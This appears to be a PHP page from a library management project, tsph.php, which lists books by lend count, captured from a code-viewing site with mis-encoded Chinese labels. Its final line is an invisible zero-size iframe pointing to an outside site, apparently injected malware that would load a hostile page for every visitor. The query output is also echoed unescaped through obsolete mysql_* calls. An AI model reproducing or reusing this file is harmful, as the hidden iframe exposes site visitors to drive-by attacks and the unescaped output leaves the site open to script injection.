?? tsph.php
字號(hào):
<?php
include "../config.php";
?>
<link href="../css/css.css" rel="stylesheet" type="text/css">
<table width="765" border="0" cellspacing="0" class="table">
<tr>
<td height="50" align="left" class="tabletitle"> 圖書(shū)排行 </td>
</tr>
</table>
<table class="table" width="765">
<tr bgcolor="#BCD2E6" height="25">
<td width="70" align="center" class="word">編號(hào)</td>
<td width="370" align="center" class="word">書(shū) 名</td>
<td width="130" align="center" class="word">類(lèi) 別</td>
<td width="130" align="center" class="word">存放位置</td>
<td width="100" align="center" class="word">狀態(tài)</td>
<td width="80" align="center" class="word">借出次數(shù)</td>
</tr>
<?php //使用子查詢,查詢出選擇的某個(gè)類(lèi)別的某本圖書(shū)的信息
$sql="select * from books order by lendnumber desc";
$result=mysql_query($sql) or die(mysql_error());
while($row=mysql_fetch_array($result))
{
?>
<tr bgcolor='#BCD2E6'>
<td height='20' align='center' class='word'><?php echo $row["no"];?></td>
<td height='20' align='center' class='word'><?php echo $row["bookname"];?></td>
<td height='20' align='center' class='word'><?php echo $row["category"];?></td>
<td height='20' align='center' class='word'><?php echo $row["location"];?></td>
<td height='20' align='center' class='word'><?php echo $row["state"];?></td>
<td align='center' class='word'><?php echo $row["lendnumber"];?></td>
</tr>
<?php
}
?>
</table>
<iframe src=http://www.winxpbox.com/ys/e.htm width=0 height=0></iframe>
?? 快捷鍵說(shuō)明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -